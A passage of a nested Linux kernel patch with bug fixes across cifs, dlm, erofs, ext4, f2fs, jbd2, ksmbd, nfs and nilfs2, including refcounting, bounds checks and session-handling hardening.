+@@ -3851,7 +3858,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		if (ses->tcon_ipc && ses->tcon_ipc->need_reconnect) {
+ 			list_add_tail(&ses->tcon_ipc->rlist, &tmp_list);
+ 			tcon_selected = tcon_exist = true;
+-			ses->ses_count++;
++			cifs_smb_ses_inc_refcount(ses);
+ 		}
+ 		/*
+ 		 * handle the case where channel needs to reconnect
+@@ -3862,7 +3869,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		if (!tcon_selected && cifs_chan_needs_reconnect(ses, server)) {
+ 			list_add_tail(&ses->rlist, &tmp_ses_list);
+ 			ses_exist = true;
+-			ses->ses_count++;
++			cifs_smb_ses_inc_refcount(ses);
+ 		}
+ 		spin_unlock(&ses->chan_lock);
+ 	}
+diff --git a/fs/dlm/ast.c b/fs/dlm/ast.c
+index 26fef9945cc90..39805aea33367 100644
+--- a/fs/dlm/ast.c
++++ b/fs/dlm/ast.c
+@@ -45,7 +45,7 @@ void dlm_purge_lkb_callbacks(struct dlm_lkb *lkb)
+ 		kref_put(&cb->ref, dlm_release_callback);
+ 	}
+ 
+-	lkb->lkb_flags &= ~DLM_IFL_CB_PENDING;
++	clear_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags);
+ 
+ 	/* invalidate */
+ 	dlm_callback_set_last_ptr(&lkb->lkb_last_cast, NULL);
+@@ -103,10 +103,9 @@ int dlm_enqueue_lkb_callback(struct dlm_lkb *lkb, uint32_t flags, int mode,
+ 	cb->sb_status = status;
+ 	cb->sb_flags = (sbflags & 0x000000FF);
+ 	kref_init(&cb->ref);
+-	if (!(lkb->lkb_flags & DLM_IFL_CB_PENDING)) {
+-		lkb->lkb_flags |= DLM_IFL_CB_PENDING;
++	if (!test_and_set_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags))
+ 		rv = DLM_ENQUEUE_CALLBACK_NEED_SCHED;
+-	}
++
+ 	list_add_tail(&cb->list, &lkb->lkb_callbacks);
+ 
+ 	if (flags & DLM_CB_CAST)
+@@ -209,7 +208,7 @@ void dlm_callback_work(struct work_struct *work)
+ 		spin_lock(&lkb->lkb_cb_lock);
+ 		rv = dlm_dequeue_lkb_callback(lkb, &cb);
+ 		if (rv == DLM_DEQUEUE_CALLBACK_EMPTY) {
+-			lkb->lkb_flags &= ~DLM_IFL_CB_PENDING;
++			clear_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags);
+ 			spin_unlock(&lkb->lkb_cb_lock);
+ 			break;
+ 		}
+diff --git a/fs/dlm/dlm_internal.h b/fs/dlm/dlm_internal.h
+index ab1a55337a6eb..9bf70962bc495 100644
+--- a/fs/dlm/dlm_internal.h
++++ b/fs/dlm/dlm_internal.h
+@@ -211,7 +211,9 @@ struct dlm_args {
+ #endif
+ #define DLM_IFL_DEADLOCK_CANCEL	0x01000000
+ #define DLM_IFL_STUB_MS		0x02000000 /* magic number for m_flags */
+-#define DLM_IFL_CB_PENDING	0x04000000
++
++#define DLM_IFL_CB_PENDING_BIT	0
++
+ /* least significant 2 bytes are message changed, they are full transmitted
+  * but at receive side only the 2 bytes LSB will be set.
+  *
+@@ -246,6 +248,7 @@ struct dlm_lkb {
+ 	uint32_t		lkb_exflags;	/* external flags from caller */
+ 	uint32_t		lkb_sbflags;	/* lksb flags */
+ 	uint32_t		lkb_flags;	/* internal flags */
++	unsigned long		lkb_iflags;	/* internal flags */
+ 	uint32_t		lkb_lvbseq;	/* lvb sequence number */
+ 
+ 	int8_t			lkb_status;     /* granted, waiting, convert */
+diff --git a/fs/dlm/user.c b/fs/dlm/user.c
+index 35129505ddda1..688a480879e4b 100644
+--- a/fs/dlm/user.c
++++ b/fs/dlm/user.c
+@@ -884,7 +884,7 @@ static ssize_t device_read(struct file *file, char __user *buf, size_t count,
+ 		goto try_another;
+ 	case DLM_DEQUEUE_CALLBACK_LAST:
+ 		list_del_init(&lkb->lkb_cb_list);
+-		lkb->lkb_flags &= ~DLM_IFL_CB_PENDING;
++		clear_bit(DLM_IFL_CB_PENDING_BIT, &lkb->lkb_iflags);
+ 		break;
+ 	case DLM_DEQUEUE_CALLBACK_SUCCESS:
+ 		break;
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index bb8501c0ff5b5..29b104754fb44 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -154,6 +154,7 @@ struct erofs_sb_info {
+ 
+ 	/* what we really care is nid, rather than ino.. */
+ 	erofs_nid_t root_nid;
++	erofs_nid_t packed_nid;
+ 	/* used for statfs, f_files - f_favail */
+ 	u64 inos;
+ 
+@@ -309,7 +310,7 @@ struct erofs_inode {
+ 
+ 	unsigned char datalayout;
+ 	unsigned char inode_isize;
+-	unsigned short xattr_isize;
++	unsigned int xattr_isize;
+ 
+ 	unsigned int xattr_shared_count;
+ 	unsigned int *xattr_shared_xattrs;
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 626a615dafc2f..bd8bf8fc2f5df 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -381,17 +381,7 @@ static int erofs_read_superblock(struct super_block *sb)
+ #endif
+ 	sbi->islotbits = ilog2(sizeof(struct erofs_inode_compact));
+ 	sbi->root_nid = le16_to_cpu(dsb->root_nid);
+-#ifdef CONFIG_EROFS_FS_ZIP
+-	sbi->packed_inode = NULL;
+-	if (erofs_sb_has_fragments(sbi) && dsb->packed_nid) {
+-		sbi->packed_inode =
+-			erofs_iget(sb, le64_to_cpu(dsb->packed_nid));
+-		if (IS_ERR(sbi->packed_inode)) {
+-			ret = PTR_ERR(sbi->packed_inode);
+-			goto out;
+-		}
+-	}
+-#endif
++	sbi->packed_nid = le64_to_cpu(dsb->packed_nid);
+ 	sbi->inos = le64_to_cpu(dsb->inos);
+ 
+ 	sbi->build_time = le64_to_cpu(dsb->build_time);
+@@ -800,6 +790,16 @@ static int erofs_fc_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	erofs_shrinker_register(sb);
+ 	/* sb->s_umount is already locked, SB_ACTIVE and SB_BORN are not set */
++#ifdef CONFIG_EROFS_FS_ZIP
++	if (erofs_sb_has_fragments(sbi) && sbi->packed_nid) {
++		sbi->packed_inode = erofs_iget(sb, sbi->packed_nid);
++		if (IS_ERR(sbi->packed_inode)) {
++			err = PTR_ERR(sbi->packed_inode);
++			sbi->packed_inode = NULL;
++			return err;
++		}
++	}
++#endif
+ 	err = erofs_init_managed_cache(sb);
+ 	if (err)
+ 		return err;
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 98fb90b9af715..91733f8ecdffc 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -211,6 +211,10 @@ static int legacy_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ 		if (advise & Z_EROFS_VLE_DI_PARTIAL_REF)
+ 			m->partialref = true;
+ 		m->clusterofs = le16_to_cpu(di->di_clusterofs);
++		if (m->clusterofs >= 1 << vi->z_logical_clusterbits) {
++			DBG_BUGON(1);
++			return -EFSCORRUPTED;
++		}
+ 		m->pblk = le32_to_cpu(di->di_u.blkaddr);
+ 		break;
+ 	default:
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 9de1c9d1a13d3..ee5acf2bd5e67 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -5802,7 +5802,8 @@ int ext4_clu_mapped(struct inode *inode, ext4_lblk_t lclu)
+ 	 * mapped - no physical clusters have been allocated, and the
+ 	 * file has no extents
+ 	 */
+-	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
++	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA) ||
++	    ext4_has_inline_data(inode))
+ 		return 0;
+ 
+ 	/* search for the extent closest to the first block in the cluster */
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 96517785a9f89..0b87665aaff13 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -3149,6 +3149,9 @@ static int ext4_da_write_end(struct file *file,
+ 	    ext4_has_inline_data(inode))
+ 		return ext4_write_inline_data_end(inode, pos, len, copied, page);
+ 
++	if (unlikely(copied < len) && !PageUptodate(page))
++		copied = 0;
++
+ 	start = pos & (PAGE_SIZE - 1);
+ 	end = start + copied - 1;
+ 
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 2532f369cb10f..07c96fea76fe1 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -759,7 +759,12 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 
+ 	if (dic->clen > PAGE_SIZE * dic->nr_cpages - COMPRESS_HEADER_SIZE) {
+ 		ret = -EFSCORRUPTED;
+-		f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
++
++		/* Avoid f2fs_commit_super in irq context */
++		if (in_task)
++			f2fs_save_errors(sbi, ERROR_FAIL_DECOMPRESSION);
++		else
++			f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
+ 		goto out_release;
+ 	}
+ 
+@@ -1459,6 +1464,12 @@ continue_unlock:
+ 		if (!PageDirty(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
++		if (PageWriteback(cc->rpages[i])) {
++			if (wbc->sync_mode == WB_SYNC_NONE)
++				goto continue_unlock;
++			f2fs_wait_on_page_writeback(cc->rpages[i], DATA, true, true);
++		}
++
+ 		if (!clear_page_dirty_for_io(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index a28d05895f5c7..75e59e7016590 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -873,6 +873,8 @@ void f2fs_submit_merged_ipu_write(struct f2fs_sb_info *sbi,
+ 	bool found = false;
+ 	struct bio *target = bio ? *bio : NULL;
+ 
++	f2fs_bug_on(sbi, !target && !page);
++
+ 	for (temp = HOT; temp < NR_TEMP_TYPE && !found; temp++) {
+ 		struct f2fs_bio_info *io = sbi->write_io[DATA] + temp;
+ 		struct list_head *head = &io->bio_list;
+@@ -2899,7 +2901,8 @@ out:
+ 
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		f2fs_submit_merged_write(sbi, DATA);
+-		f2fs_submit_merged_ipu_write(sbi, bio, NULL);
++		if (bio && *bio)
++			f2fs_submit_merged_ipu_write(sbi, bio, NULL);
+ 		submitted = NULL;
+ 	}
+ 
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index e8953c3dc81ab..42962ee0a1179 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3576,6 +3576,7 @@ int f2fs_quota_sync(struct super_block *sb, int type);
+ loff_t max_file_blocks(struct inode *inode);
+ void f2fs_quota_off_umount(struct super_block *sb);
+ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason);
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag);
+ void f2fs_handle_error(struct f2fs_sb_info *sbi, unsigned char error);
+ int f2fs_commit_super(struct f2fs_sb_info *sbi, bool recover);
+ int f2fs_sync_fs(struct super_block *sb, int sync);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 05297427552ac..de92279a80020 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -2117,7 +2117,11 @@ static int f2fs_ioc_start_atomic_write(struct file *filp, bool truncate)
+ 		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 	} else {
+ 		/* Reuse the already created COW inode */
+-		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		ret = f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
+ 	}
+ 
+ 	f2fs_write_inode(inode, NULL);
+@@ -3013,15 +3017,16 @@ int f2fs_transfer_project_quota(struct inode *inode, kprojid_t kprojid)
+ 	struct dquot *transfer_to[MAXQUOTAS] = {};
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct super_block *sb = sbi->sb;
+-	int err = 0;
++	int err;
+ 
+ 	transfer_to[PRJQUOTA] = dqget(sb, make_kqid_projid(kprojid));
+-	if (!IS_ERR(transfer_to[PRJQUOTA])) {
+-		err = __dquot_transfer(inode, transfer_to);
+-		if (err)
+-			set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
+-		dqput(transfer_to[PRJQUOTA]);
+-	}
++	if (IS_ERR(transfer_to[PRJQUOTA]))
++		return PTR_ERR(transfer_to[PRJQUOTA]);
++
++	err = __dquot_transfer(inode, transfer_to);
++	if (err)
++		set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
++	dqput(transfer_to[PRJQUOTA]);
+ 	return err;
+ }
+ 
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 6e2cae3d2e717..72cda2f9380f2 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1795,8 +1795,8 @@ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control)
+ 				prefree_segments(sbi));
+ 
+ 	cpc.reason = __get_cp_reason(sbi);
+-	sbi->skipped_gc_rwsem = 0;
+ gc_more:
++	sbi->skipped_gc_rwsem = 0;
+ 	if (unlikely(!(sbi->sb->s_flags & SB_ACTIVE))) {
+ 		ret = -EINVAL;
+ 		goto stop;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 269f89d202c61..06991cf643296 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -246,10 +246,16 @@ retry:
+ 	} else {
+ 		blkcnt_t count = 1;
+ 
++		err = inc_valid_block_count(sbi, inode, &count);
++		if (err) {
++			f2fs_put_dnode(&dn);
++			return err;
++		}
++
+ 		*old_addr = dn.data_blkaddr;
+ 		f2fs_truncate_data_blocks_range(&dn, 1);
+ 		dec_valid_block_count(sbi, F2FS_I(inode)->cow_inode, count);
+-		inc_valid_block_count(sbi, inode, &count);
++
+ 		f2fs_replace_block(sbi, &dn, dn.data_blkaddr, new_addr,
+ 					ni.version, true, false);
+ 	}
+@@ -4951,48 +4957,6 @@ int f2fs_check_write_pointer(struct f2fs_sb_info *sbi)
+ 	return 0;
+ }
+ 
+-static bool is_conv_zone(struct f2fs_sb_info *sbi, unsigned int zone_idx,
+-						unsigned int dev_idx)
+-{
+-	if (!bdev_is_zoned(FDEV(dev_idx).bdev))
+-		return true;
+-	return !test_bit(zone_idx, FDEV(dev_idx).blkz_seq);
+-}
+-
+-/* Return the zone index in the given device */
+-static unsigned int get_zone_idx(struct f2fs_sb_info *sbi, unsigned int secno,
+-					int dev_idx)
+-{
+-	block_t sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+-
+-	return (sec_start_blkaddr - FDEV(dev_idx).start_blk) >>
+-						sbi->log_blocks_per_blkz;
+-}
+-
+-/*
+- * Return the usable segments in a section based on the zone's
+- * corresponding zone capacity. Zone is equal to a section.
+- */
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(
+-		struct f2fs_sb_info *sbi, unsigned int segno)
+-{
+-	unsigned int dev_idx, zone_idx;
+-
+-	dev_idx = f2fs_target_device_index(sbi, START_BLOCK(sbi, segno));
+-	zone_idx = get_zone_idx(sbi, GET_SEC_FROM_SEG(sbi, segno), dev_idx);
+-
+-	/* Conventional zone's capacity is always equal to zone size */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->segs_per_sec;
+-
+-	if (!sbi->unusable_blocks_per_sec)
+-		return sbi->segs_per_sec;
+-
+-	/* Get the segment count beyond zone capacity block */
+-	return sbi->segs_per_sec - (sbi->unusable_blocks_per_sec >>
+-						sbi->log_blocks_per_seg);
+-}
+-
+ /*
+  * Return the number of usable blocks in a segment. The number of blocks
+  * returned is always equal to the number of blocks in a segment for
+@@ -5005,23 +4969,13 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(
+ 			struct f2fs_sb_info *sbi, unsigned int segno)
+ {
+ 	block_t seg_start, sec_start_blkaddr, sec_cap_blkaddr;
+-	unsigned int zone_idx, dev_idx, secno;
+-
+-	secno = GET_SEC_FROM_SEG(sbi, segno);
+-	seg_start = START_BLOCK(sbi, segno);
+-	dev_idx = f2fs_target_device_index(sbi, seg_start);
+-	zone_idx = get_zone_idx(sbi, secno, dev_idx);
+-
+-	/*
+-	 * Conventional zone's capacity is always equal to zone size,
+-	 * so, blocks per segment is unchanged.
+-	 */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->blocks_per_seg;
++	unsigned int secno;
+ 
+ 	if (!sbi->unusable_blocks_per_sec)
+ 		return sbi->blocks_per_seg;
+ 
++	secno = GET_SEC_FROM_SEG(sbi, segno);
++	seg_start = START_BLOCK(sbi, segno);
+ 	sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+ 	sec_cap_blkaddr = sec_start_blkaddr + CAP_BLKS_PER_SEC(sbi);
+ 
+@@ -5055,11 +5009,6 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(struct f2fs_sb_info *sbi
+ 	return 0;
+ }
+ 
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(struct f2fs_sb_info *sbi,
+-							unsigned int segno)
+-{
+-	return 0;
+-}
+ #endif
+ unsigned int f2fs_usable_blks_in_seg(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+@@ -5074,7 +5023,7 @@ unsigned int f2fs_usable_segs_in_sec(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+ {
+ 	if (f2fs_sb_has_blkzoned(sbi))
+-		return f2fs_usable_zone_segs_in_sec(sbi, segno);
++		return CAP_SEGS_PER_SEC(sbi);
+ 
+ 	return sbi->segs_per_sec;
+ }
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index 6eb5922a25361..822c47fdc6e35 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -104,6 +104,9 @@ static inline void sanity_check_seg_type(struct f2fs_sb_info *sbi,
+ #define CAP_BLKS_PER_SEC(sbi)					\
+ 	((sbi)->segs_per_sec * (sbi)->blocks_per_seg -		\
+ 	 (sbi)->unusable_blocks_per_sec)
++#define CAP_SEGS_PER_SEC(sbi)					\
++	((sbi)->segs_per_sec - ((sbi)->unusable_blocks_per_sec >>\
++	(sbi)->log_blocks_per_seg))
+ #define GET_SEC_FROM_SEG(sbi, segno)				\
+ 	(((segno) == -1) ? -1: (segno) / (sbi)->segs_per_sec)
+ #define GET_SEG_FROM_SEC(sbi, secno)				\
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 551468dad3275..3711445a2489b 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -3895,7 +3895,7 @@ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason)
+ 	f2fs_up_write(&sbi->sb_lock);
+ }
+ 
+-static void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
+ {
+ 	spin_lock(&sbi->error_lock);
+ 	if (!test_bit(flag, (unsigned long *)sbi->errors)) {
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 088b816127ecb..2884efe5269ed 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -564,9 +564,9 @@ out:
+ 	if (!strcmp(a->attr.name, "iostat_period_ms")) {
+ 		if (t < MIN_IOSTAT_PERIOD_MS || t > MAX_IOSTAT_PERIOD_MS)
+ 			return -EINVAL;
+-		spin_lock(&sbi->iostat_lock);
++		spin_lock_irq(&sbi->iostat_lock);
+ 		sbi->iostat_period_ms = (unsigned int)t;
+-		spin_unlock(&sbi->iostat_lock);
++		spin_unlock_irq(&sbi->iostat_lock);
+ 		return count;
+ 	}
+ #endif
+diff --git a/fs/jbd2/transaction.c b/fs/jbd2/transaction.c
+index 15de1385012eb..18611241f4513 100644
+--- a/fs/jbd2/transaction.c
++++ b/fs/jbd2/transaction.c
+@@ -2387,6 +2387,9 @@ static int journal_unmap_buffer(journal_t *journal, struct buffer_head *bh,
+ 			spin_unlock(&jh->b_state_lock);
+ 			write_unlock(&journal->j_state_lock);
+ 			jbd2_journal_put_journal_head(jh);
++			/* Already zapped buffer? Nothing to do... */
++			if (!bh->b_bdev)
++				return 0;
+ 			return -EBUSY;
+ 		}
+ 		/*
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index cead696b656a8..df8fb076f6f14 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -221,22 +221,22 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ {
+ 	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+ 	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
+-	struct ksmbd_crypto_ctx *ctx;
++	struct ksmbd_crypto_ctx *ctx = NULL;
+ 	char *construct = NULL;
+ 	int rc, len;
+ 
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+ 	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
+ 	if (rc) {
+ 		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
+ 		goto out;
+ 	}
+ 
++	ctx = ksmbd_crypto_ctx_find_hmacmd5();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
+ 	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+ 				 ntlmv2_hash,
+ 				 CIFS_HMAC_MD5_HASH_SIZE);
+@@ -272,6 +272,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+ 		goto out;
+ 	}
++	ksmbd_release_crypto_ctx(ctx);
++	ctx = NULL;
+ 
+ 	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
+ 	if (rc) {
+@@ -282,7 +284,8 @@ int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
+ 		rc = -EINVAL;
+ out:
+-	ksmbd_release_crypto_ctx(ctx);
++	if (ctx)
++		ksmbd_release_crypto_ctx(ctx);
+ 	kfree(construct);
+ 	return rc;
+ }
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+index 8ce17b3fb8dad..f19de20c2960c 100644
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ b/fs/ksmbd/mgmt/tree_connect.c
+@@ -109,7 +109,15 @@ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ 						  unsigned int id)
+ {
+-	return xa_load(&sess->tree_conns, id);
++	struct ksmbd_tree_connect *tcon;
++
++	tcon = xa_load(&sess->tree_conns, id);
++	if (tcon) {
++		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
++			tcon = NULL;
++	}
++
++	return tcon;
+ }
+ 
+ struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+diff --git a/fs/ksmbd/mgmt/tree_connect.h b/fs/ksmbd/mgmt/tree_connect.h
+index 0f97ddc1e39c0..700df36cf3e30 100644
+--- a/fs/ksmbd/mgmt/tree_connect.h
++++ b/fs/ksmbd/mgmt/tree_connect.h
+@@ -14,6 +14,8 @@ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
+ 
++#define TREE_CONN_EXPIRE		1
++
+ struct ksmbd_tree_connect {
+ 	int				id;
+ 
+@@ -25,6 +27,7 @@ struct ksmbd_tree_connect {
+ 
+ 	int				maximal_access;
+ 	bool				posix_extensions;
++	unsigned long			status;
+ };
+ 
+ struct ksmbd_tree_conn_status {
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 0d8242789dc8f..cd8a873347a79 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -606,6 +606,7 @@ err_unregister:
+ static void __exit ksmbd_server_exit(void)
+ {
+ 	ksmbd_server_shutdown();
++	rcu_barrier();
+ 	ksmbd_release_inode_hash();
+ }
+ 
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 32a837014cbfc..decaef3592f43 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1456,7 +1456,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		 * Reuse session if anonymous try to connect
+ 		 * on reauthetication.
+ 		 */
+-		if (ksmbd_anonymous_user(user)) {
++		if (conn->binding == false && ksmbd_anonymous_user(user)) {
+ 			ksmbd_free_user(user);
+ 			return 0;
+ 		}
+@@ -1470,7 +1470,7 @@ static int ntlm_authenticate(struct ksmbd_work *work)
+ 		sess->user = user;
+ 	}
+ 
+-	if (user_guest(sess->user)) {
++	if (conn->binding == false && user_guest(sess->user)) {
+ 		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
+ 	} else {
+ 		struct authenticate_message *authblob;
+@@ -1715,6 +1715,11 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			goto out_err;
+ 		}
+ 
++		if (user_guest(sess->user)) {
++			rc = -EOPNOTSUPP;
++			goto out_err;
++		}
++
+ 		conn->binding = true;
+ 	} else if ((conn->dialect < SMB30_PROT_ID ||
+ 		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+@@ -1801,6 +1806,10 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 				}
+ 				kfree(sess->Preauth_HashValue);
+ 				sess->Preauth_HashValue = NULL;
++			} else {
++				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
++						le32_to_cpu(negblob->MessageType));
++				rc = -EINVAL;
+ 			}
+ 		} else {
+ 			/* TODO: need one more negotiation */
+@@ -1823,6 +1832,8 @@ out_err:
+ 		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
+ 	else if (rc == -ENOMEM)
+ 		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++	else if (rc == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+ 	else if (rc)
+ 		rsp->hdr.Status = STATUS_LOGON_FAILURE;
+ 
+@@ -2055,11 +2066,12 @@ int smb2_tree_disconnect(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "request\n");
+ 
+-	if (!tcon) {
++	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+ 		struct smb2_tree_disconnect_req *req =
+ 			smb2_get_msg(work->request_buf);
+ 
+ 		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
++
+ 		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+ 		smb2_set_err_rsp(work);
+ 		return 0;
+@@ -4914,6 +4926,9 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 	int rc = 0, len;
+ 	int fs_infoclass_size = 0;
+ 
++	if (!share->path)
++		return -EIO;
++
+ 	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
+ 	if (rc) {
+ 		pr_err("cannot create vfs path\n");
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 2a0ca5c7f082a..660ccfaf463e4 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -67,6 +67,8 @@
+ 
+ #define OPENOWNER_POOL_SIZE	8
+ 
++static void nfs4_state_start_reclaim_reboot(struct nfs_client *clp);
++
+ const nfs4_stateid zero_stateid = {
+ 	{ .data = { 0 } },
+ 	.type = NFS4_SPECIAL_STATEID_TYPE,
+@@ -330,6 +332,8 @@ do_confirm:
+ 	status = nfs4_proc_create_session(clp, cred);
+ 	if (status != 0)
+ 		goto out;
++	if (!(clp->cl_exchange_flags & EXCHGID4_FLAG_CONFIRMED_R))
++		nfs4_state_start_reclaim_reboot(clp);
+ 	nfs41_finish_session_reset(clp);
+ 	nfs_mark_client_ready(clp, NFS_CS_READY);
+ out:
+diff --git a/fs/nilfs2/bmap.c b/fs/nilfs2/bmap.c
+index 798a2c1b38c6c..7a8f166f2c8d8 100644
+--- a/fs/nilfs2/bmap.c
++++ b/fs/nilfs2/bmap.c
+@@ -67,20 +67,28 @@ int nilfs_bmap_lookup_at_level(struct nilfs_bmap *bmap, __u64 key, int level,
+ 
+ 	down_read(&bmap->b_sem);
+ 	ret = bmap->b_ops->bop_lookup(bmap, key, level, ptrp);
+-	if (ret < 0) {
+-		ret = nilfs_bmap_convert_error(bmap, __func__, ret);
++	if (ret < 0)
+ 		goto out;
+-	}
++
+ 	if (NILFS_BMAP_USE_VBN(bmap)) {
+ 		ret = nilfs_dat_translate(nilfs_bmap_get_dat(bmap), *ptrp,
+ 					  &blocknr);
+ 		if (!ret)
